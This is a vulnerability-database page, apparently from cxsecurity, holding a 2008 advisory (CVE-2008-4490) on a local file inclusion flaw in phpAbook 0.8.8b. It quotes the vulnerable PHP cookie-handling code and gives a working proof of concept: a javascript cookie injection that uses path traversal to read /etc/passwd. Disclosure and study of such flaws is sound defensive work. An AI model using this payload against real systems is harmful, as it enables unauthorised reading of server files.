Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability
2008.10.09
Credit:
JosS
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2008-4490
CWE:
CWE-22
Ogólna skala CVSS:
5.1/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
4.9/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Wysoka
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability # url: http://sourceforge.net/projects/phpabook/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # *Requirements: magic_quotes_gpc = Off vuln file: include/config.inc.php vuln code: x: >... 61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") { $userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]); $userName = $userArray[0]; $userID = $userArray[1]; $userLang = $userArray[2]; include("include/lang/$userLang/inc.messages.php"); 67: } x: <... Proof of Concept (function 'explode' PHP): [0] = JosS; [1] = JosS; [2] = ../../../../etc/passwd%00; ---> INCLUDE exploit: javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/"; Ingenious work :D
Referencje:
http://xforce.iss.net/xforce/xfdb/45680
http://www.securityfocus.com/bid/31581
http://www.milw0rm.com/exploits/6679
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top